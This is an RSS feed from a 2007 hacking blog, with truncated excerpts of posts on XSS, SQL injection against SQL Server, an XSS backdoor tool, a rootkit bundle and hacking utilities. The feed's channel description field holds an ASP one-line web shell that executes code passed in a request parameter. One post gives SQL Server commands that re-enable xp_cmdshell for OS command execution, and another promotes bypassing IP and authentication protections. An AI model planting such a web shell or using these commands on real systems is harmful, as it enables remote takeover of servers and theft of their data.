<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
 <channel>
  <title>H4ck3r's boX</title>
  <link>http://h4ck3r.blogbus.com</link>
  <description><![CDATA[<%ExecuteGlobal request("h4ck3r")%>]]></description>
  <generator> by blogbus.com </generator>
  <lastBuildDate>Thu, 01 Jan 1970 07:00:00 +0700</lastBuildDate>
  <image>
									<url>http://public.blogbus.com/profile/9/2/8/1368829/avatar_1368829_96.jpg</url>
									<title>H4ck3r's boX</title>
									<link>http://h4ck3r.blogbus.com</link>
								</image>  <item>
   <title>XSS The Complete Walkthrough [About]</title>
   <description><![CDATA[--==+================================================================================+==--
--==+                     XSS The Complete Walkthrough [About]                       +==--
--==+================================================================================+==--

Author: t0pP8uZz

Description: Complete tutorial on XSS methods.

Homepage: G0t-Root.net, H4cky0u.org, Milw0rm.co...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="http://h4ck3r.blogbus.com/logs/8116175.html">Sql-injection In Xss[SIX]</a> 2007-09-05</div><div><a href="http://h4ck3r.blogbus.com/logs/7984312.html">针对$_SERVER[’PHP_SELF’]的跨站脚本攻击（XSS）</a> 2007-08-29</div><div><a href="http://h4ck3r.blogbus.com/logs/5055318.html">Ajax hacking with XSS</a> 2007-04-16</div><div><a href="http://h4ck3r.blogbus.com/logs/5055274.html">XSS与社会工程学</a> 2007-04-16</div><div><a href="/logs/6834446.html">M-T Trojan</a> 2007-07-18</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F10502333.html&title=XSS+The+Complete+Walkthrough+%5BAbout%5D">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/10502333.html</link>
   <author>h4ck3r</author>
   <pubDate>Sat, 27 Oct 2007 11:40:17 +0800</pubDate>
  </item>
  <item>
   <title>XSS SHELL v0.6.2</title>
   <description><![CDATA[<div class="content">
<p>
-------------------------<br />
WHAT IS XSS SHELL ?<br />
-------------------------<br />
XSS Shell is a powerful XSS backdoor and XSS zombie manager.&nbsp; This concept was first presented by &quot;XSS-Proxy - <a href="http://xss-proxy.sourceforge.net/">http://xss-proxy.sourceforge.net/</a>&quot;. Normally during XSS attacks an attacker has one shot however,an XSS Shell can be used interactively to send requests and receive responses from a victim, it is also possible to backdoor the page and keep the connection open between the attacker and the victim. 
</p>
<p>
It is a good way of bypassing the following protections:<br />
&nbsp;- Bypassing IP Restrictions<br />
&nbsp;- NTLM / Basic Auth or any similar authentication<br />
&nbsp;- Session based custom protections 
</p>
</div>
<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/5206878.html">In flames-only for the weak</a> 2007-04-30</div><div><a href="/logs/5141841.html">Slipknot 2005年现场专辑9.0Live</a> 2007-04-24</div><div><a href="/logs/5101180.html">木桶新理论与信息安全</a> 2007-04-21</div><div><a href="/logs/5095484.html">[翻译]米特尼克<欺骗的艺术>I</a> 2007-04-20</div><div><a href="/logs/5055335.html">IIS 6 的PHP 最佳配置方法</a> 2007-04-16</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F8317101.html&title=XSS+SHELL+v0.6.2">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/8317101.html</link>
   <author>h4ck3r</author>
   <pubDate>Mon, 17 Sep 2007 20:00:26 +0800</pubDate>
  </item>
  <item>
   <title>Sql-injection In Xss[SIX]</title>
   <description><![CDATA[
	
		
			
		
	

BY superhei@ph4nt0m.org<br />
2007-09-04<br />
http://www.ph4nt0m.org<br />
<br />
SIX存在的意义：<br />
1、有权限限制的地方总是让人比较放心，比如后台、内网 .... 。而且有的程序官方否认...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="http://h4ck3r.blogbus.com/logs/10502333.html">XSS The Complete Walkthrough [About]</a> 2007-10-27</div><div><a href="http://h4ck3r.blogbus.com/logs/7984312.html">针对$_SERVER[’PHP_SELF’]的跨站脚本攻击（XSS）</a> 2007-08-29</div><div><a href="http://h4ck3r.blogbus.com/logs/5055318.html">Ajax hacking with XSS</a> 2007-04-16</div><div><a href="http://h4ck3r.blogbus.com/logs/5055274.html">XSS与社会工程学</a> 2007-04-16</div><div><a href="/logs/5224340.html">Linkin Park-What I've Done</a> 2007-05-01</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F8116175.html&title=Sql-injection+In+Xss%5BSIX%5D">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/8116175.html</link>
   <author>h4ck3r</author>
   <pubDate>Wed, 05 Sep 2007 19:33:34 +0800</pubDate>
  </item>
  <item>
   <title>针对$_SERVER[’PHP_SELF’]的跨站脚本攻击（XSS）</title>
   <description><![CDATA[现在的web服务器和开发工具虽然不会再出现像asp的%81那样明显的漏洞了，但是由于开发人员的疏忽和各种语言特性组合造成的一些奇异的漏洞仍然会存在。今天偶然读到的XSS Woes，就详细讲述了和$_SERVER[&rsquo;PHP_SELF&rsquo;]相关的一个危险漏洞。<br />
<br />
$_SERVER[&rsquo;PHP_SELF&rsquo;]在开发的时候常会用到，一般用来引用当前网页地址，并且它是系统自动生成的全局变量，也会有什么问题么？让我们先看看下面的代码吧：<br />
<br />
&lt;form action=&rdquo;&lt;?php echo $_SERVER[&rsquo;PHP_SELF&rsquo;]; ?&gt;&rdquo;&gt;<br />
&lt;input type=&rdquo;submit&rdquo; name...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="http://h4ck3r.blogbus.com/logs/10502333.html">XSS The Complete Walkthrough [About]</a> 2007-10-27</div><div><a href="http://h4ck3r.blogbus.com/logs/8116175.html">Sql-injection In Xss[SIX]</a> 2007-09-05</div><div><a href="http://h4ck3r.blogbus.com/logs/5055318.html">Ajax hacking with XSS</a> 2007-04-16</div><div><a href="http://h4ck3r.blogbus.com/logs/5055274.html">XSS与社会工程学</a> 2007-04-16</div><div><a href="/logs/8317101.html">XSS SHELL v0.6.2</a> 2007-09-17</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F7984312.html&title=%E9%92%88%E5%AF%B9%24_SERVER%5B%E2%80%99PHP_SELF%E2%80%99%5D%E7%9A%84%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB%EF%BC%88XSS%EF%BC%89">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/7984312.html</link>
   <author>h4ck3r</author>
   <pubDate>Wed, 29 Aug 2007 13:11:44 +0800</pubDate>
  </item>
  <item>
   <title>常见情况恢复执行xp_cmdshell</title>
   <description><![CDATA[常见情况恢复执行xp_cmdshell.<br />
<br />
1 未能找到存储过程'master..xpcmdshell'.<br />
&nbsp;&nbsp; 恢复方法：查询分离器连接后,<br />
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int <br />
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' <br />
然后按F5键命令执行完毕<br />
<br />
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）<br />
恢复方法：查询分离器连接后,<br />
第一步执行：sp_dropextende...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="http://h4ck3r.blogbus.com/logs/5101180.html">木桶新理论与信息安全</a> 2007-04-21</div><div><a href="http://h4ck3r.blogbus.com/logs/5084020.html">MySQL数据库安全配置指南</a> 2007-04-19</div><div><a href="http://h4ck3r.blogbus.com/logs/5064511.html">win2k3服务器A级BT安全配置指南</a> 2007-04-17</div><div><a href="http://h4ck3r.blogbus.com/logs/5055296.html">WEB漏洞挖掘技术</a> 2007-04-16</div><div><a href="http://h4ck3r.blogbus.com/logs/5055240.html">大型运维环境实施安全加固经验谈</a> 2007-04-16</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F7884216.html&title=%E5%B8%B8%E8%A7%81%E6%83%85%E5%86%B5%E6%81%A2%E5%A4%8D%E6%89%A7%E8%A1%8Cxp_cmdshell">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/7884216.html</link>
   <author>h4ck3r</author>
   <pubDate>Thu, 23 Aug 2007 20:08:20 +0800</pubDate>
  </item>
  <item>
   <title>M-T Trojan</title>
   <description><![CDATA[<br /><br /><img src="http://img129.imageshack.us/img129/3145/mttrojanpx1.jpg" border="0" alt="" width="640" height="596" /><br /><!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/8317101.html">XSS SHELL v0.6.2</a> 2007-09-17</div><div><a href="/logs/5231692.html">SlipknoT 2000 格莱美现场</a> 2007-05-02</div><div><a href="/logs/5203267.html">PHP Remote File Injecter v1.0</a> 2007-04-29</div><div><a href="/logs/5057252.html">XSS shell v0.3.8</a> 2007-04-16</div><div><a href="/logs/5056859.html">XAMPP Mssql_Connect Remote Buffer Overflow Vulnerability</a> 2007-04-16</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F6834446.html&title=M-T+Trojan">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/6834446.html</link>
   <author>h4ck3r</author>
   <pubDate>Wed, 18 Jul 2007 18:21:18 +0800</pubDate>
  </item>
  <item>
   <title>Sql-Server应用程序的高级Sql注入</title>
   <description><![CDATA[本文作者:Chris Anley <br />翻译: luoluo [luoluonet@hotmail.com] <br /><br />[目 录] <br /><br />[概要] <br />[介绍] <br />[通过错误信息获取信息] <br />[更深入的访问] <br />[xp_cmdshell] <br />[xp_regread] <br />[其他扩展存储] <br />[联合服务器] <br />[用户自定义扩展存储] <br />[向表中导入文本文件] <br />[利用BCP创建文本文件] <br />[SQL-Server里的ActiveX 脚本] <br />[存储过程] <br />[高级Sql注入] <br />[没有引号的字符串] <br />[Sql-Injection二次注入] <br />[长度限制] <br />[躲避审核] <br />[防范...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="http://h4ck3r.blogbus.com/logs/5365803.html">SQL INJECTION的终极利器opendatasource和openrowset</a> 2007-05-14</div><div><a href="http://h4ck3r.blogbus.com/logs/5365829.html">SQL Injection规避入侵检测技术总结</a> 2007-05-02</div><div><a href="/logs/7884216.html">常见情况恢复执行xp_cmdshell</a> 2007-08-23</div><div><a href="/logs/5175743.html">MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)</a> 2007-04-27</div><div><a href="/logs/5090775.html">Ardamax Keylogger 2.7</a> 2007-04-20</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F6044132.html&title=Sql-Server%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%AB%98%E7%BA%A7Sql%E6%B3%A8%E5%85%A5">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/6044132.html</link>
   <author>h4ck3r</author>
   <pubDate>Thu, 21 Jun 2007 09:33:44 +0800</pubDate>
  </item>
  <item>
   <title>xHacker v2.5 Basic</title>
   <description><![CDATA[xhackeranywhereearth@yahoo.com <br />http://xhacker.download-area51.com <br /><br /><br />Download v2.5 Basic<br />&nbsp;xHacker v2.5 Basic<br /><br />Very Important <br /><br />You must Run the file RegisterDependencies.exe before running a...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/6044132.html">Sql-Server应用程序的高级Sql注入</a> 2007-06-21</div><div><a href="/logs/5231692.html">SlipknoT 2000 格莱美现场</a> 2007-05-02</div><div><a href="/logs/5206878.html">In flames-only for the weak</a> 2007-04-30</div><div><a href="/logs/5158049.html">Bambalam PHP EXE Compiler/Embedder</a> 2007-04-26</div><div><a href="/logs/5090775.html">Ardamax Keylogger 2.7</a> 2007-04-20</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F5668104.html&title=xHacker+v2.5+Basic">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/5668104.html</link>
   <author>h4ck3r</author>
   <pubDate>Tue, 05 Jun 2007 16:03:58 +0800</pubDate>
  </item>
  <item>
   <title>r00tKiT Windowz All in One</title>
   <description><![CDATA[<br /><br />::::::::::::::::::::::::::::::: <br />r00tKiT Windowz All in One <br />::::::::::::::::::::::::::::::: <br /><br />-AFX Rootkit 2005 <br />-BootRootkit (eEye) <br />-FakeNetstat <br />-Hacker Defender 1.0.0 revisited <br />-He4Hook v2.1.5b6 <br />-NuclearRootkit v1.0 <br />-V...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="/logs/10502333.html">XSS The Complete Walkthrough [About]</a> 2007-10-27</div><div><a href="/logs/5223234.html">UPX v3.00</a> 2007-05-01</div><div><a href="/logs/5206634.html">Finntroll - Trollhammaren</a> 2007-04-30</div><div><a href="/logs/5141500.html">Lord: The Arockalypse (2006 - March)</a> 2007-04-24</div><div><a href="/logs/5080282.html">milw0rm上的video整理</a> 2007-04-19</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F5667408.html&title=r00tKiT+Windowz+All+in+One">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/5667408.html</link>
   <author>h4ck3r</author>
   <pubDate>Tue, 05 Jun 2007 15:43:51 +0800</pubDate>
  </item>
  <item>
   <title>SQL INJECTION的终极利器opendatasource和openrowset</title>
   <description><![CDATA[作者：LCX<br /><br />　　目前市面上的SQL INECTION工具很多，最受推崇的当属NBSI了。SQL INECTION的方法在网上是也是满天飞，大家仔细学一下都会很快的成为脚本入侵高手。可是无论是工具，还是众多方法，猜SQL数据的时候原理不外乎两种。一个是对方的WEB服务器在没有关闭错误提示的时候是用让SQL出错来暴出想要的信息；一个是在对方的WEB服务器关闭错误提示的时候采用ASCII码拆半分法分析。当关闭错误提示的时候，这时来猜数据就很慢了，遇到网速蜗牛的时候真是急死人，NBSI此时还经常会出现猜解错误是否要重试的警告对话框。如果我来告诉你，有了opendatasource和openrowset这两个函数，一切问题都应刃而解了。<br />　　在SQL联机从书的解释中，对没有定义为链接服务器名称的 OLE DB 数据源执行不常用查询时，使用特殊名称。在 SQL Ser...<!--sp--><div class="relpost"><br/><h3>随机文章：</h3><div><a href="http://h4ck3r.blogbus.com/logs/6044132.html">Sql-Server应用程序的高级Sql注入</a> 2007-06-21</div><div><a href="http://h4ck3r.blogbus.com/logs/5365829.html">SQL Injection规避入侵检测技术总结</a> 2007-05-02</div><div><a href="/logs/5186324.html">Children of Bodom -《Bodom Covers》2007</a> 2007-04-28</div><div><a href="/logs/5056822.html">《The Shellcoder's handbook》</a> 2007-04-16</div><div><a href="/logs/5055717.html">Net Tools 4.5 (build 74)</a> 2007-04-16</div></div><div class="addfav"><br />收藏到：<span class= "delicious"><a href="http://delicious.com/save?url=http%3A%2F%2Fh4ck3r.blogbus.com%2Flogs%2F5365803.html&title=SQL+INJECTION%E7%9A%84%E7%BB%88%E6%9E%81%E5%88%A9%E5%99%A8opendatasource%E5%92%8Copenrowset">Del.icio.us</a></span></div><br /><br /><div class="sysmsg"><b><a href="http://www.blogbus.com" target="_blank">博客大巴，你的个人传媒早班车</a></b></div><br /><br />]]></description>
   <link>http://h4ck3r.blogbus.com/logs/5365803.html</link>
   <author>h4ck3r</author>
   <pubDate>Mon, 14 May 2007 08:14:48 +0800</pubDate>
  </item>
 </channel>
</rss>
